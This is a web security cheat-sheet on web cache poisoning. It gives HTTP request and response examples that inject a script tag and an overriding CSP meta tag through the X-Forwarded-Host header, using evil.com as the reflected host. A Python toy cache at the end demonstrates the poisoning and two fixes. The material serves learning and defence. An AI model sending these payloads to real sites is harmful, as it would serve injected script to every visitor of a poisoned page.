Web Cache Poisoning
- [pweb-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
- [Cache_Poisoning](https://owasp.org/www-community/attacks/Cache_Poisoning)
- [0xn3va.gitbook.io](https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning)
Reflected XSS with Cache Poisoning
If the website reflects an arbitrary path we supply in the response, as in the example below, we can try XSS with a request like the one below.
If we use Burp Repeater to send the request above, the URL is not normalized, so the reflected XSS fires and the response is stored in the cache with the payload in it. In this state, if we get the victim to visit this URL, they will receive the cached result. In other words, the reflected XSS works despite URL normalization in the victim's web browser.
Meta Tag XSS
First, check whether the value of X-Forwarded-Host is reflected in the response (here into an og:image meta tag):

```http
GET /?id=1 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com/example.jpg" />
```
Exploit
```http
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com"><script>alert(1)</script>
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com"><script>alert(1)</script>" />
```
Meta Tag CSP Overriding
If the website sets its CSP (Content-Security-Policy) with a meta tag, we can inject our own CSP meta tag through cache poisoning, then try to bypass the CSP and chain other attacks. Keep in mind that browsers enforce every policy they receive, so an injected meta CSP cannot loosen a policy that is already in effect; check which policies the cached page actually ends up carrying.
```http
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
```
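The following is an added example, not code from the page or from any of the linked write-ups. It models the Meta Tag XSS and CSP-overriding flows above with a toy origin and a toy shared cache, then shows the two defensive fixes: keying the cache on X-Forwarded-Host, and having the origin allowlist and escape the host. It assumes `victim.com` is the site's only legitimate hostname; the cache, origin and request dictionaries are constructed for the demonstration.

```python
import html
from typing import Callable, Dict, Tuple

# Assumption: victim.com is the site's only legitimate hostname.
ALLOWED_HOSTS = {"victim.com"}
Origin = Callable[[Dict[str, str], str], str]

def origin_unsafe(headers: Dict[str, str], path: str) -> str:
    """Models the page's origin: X-Forwarded-Host lands in og:image unescaped."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    return f'<meta property="og:image" content="https://{host}/example.jpg" />'

def origin_hardened(headers: Dict[str, str], path: str) -> str:
    """Fix at the origin: allowlist the host, and HTML-escape it regardless."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    if host not in ALLOWED_HOSTS:
        host = headers["Host"]  # drop the untrusted forwarded value
    return f'<meta property="og:image" content="https://{html.escape(host, quote=True)}/example.jpg" />'

class SharedCache:
    """Toy shared cache. By default the key is only the request target, so
    X-Forwarded-Host is an unkeyed input: one poisoned miss serves everyone."""
    def __init__(self, origin: Origin, key_forwarded_host: bool = False):
        self.origin = origin
        self.key_forwarded_host = key_forwarded_host  # fix at the cache: key on the header
        self.store: Dict[str, str] = {}

    def get(self, path: str, headers: Dict[str, str]) -> Tuple[str, bool]:
        key = path
        if self.key_forwarded_host:
            key += "|" + headers.get("X-Forwarded-Host", "")
        if key in self.store:
            return self.store[key], True  # served from cache
        body = self.origin(headers, path)
        self.store[key] = body
        return body, False  # generated by the origin and stored

def poison_then_visit(origin: Origin, key_forwarded_host: bool = False) -> Tuple[str, bool]:
    """Replay the page's flow: one request carrying the hostile header, then a
    clean visit to the same URL. Returns (body the victim sees, cache hit?)."""
    cache = SharedCache(origin, key_forwarded_host)
    attacker = {"Host": "victim.com",
                "X-Forwarded-Host": 'evil.com"><script>alert(1)</script>'}  # header from the page
    cache.get("/?id=2", attacker)
    return cache.get("/?id=2", {"Host": "victim.com"})

if __name__ == "__main__":
    for origin, keyed in [(origin_unsafe, False), (origin_unsafe, True), (origin_hardened, False)]:
        print(keyed, poison_then_visit(origin, keyed))
```

With the unsafe origin and an unkeyed cache the victim's clean request is a cache hit that carries the script tag; keying the cache on the header or hardening the origin both leave the victim with a clean meta tag.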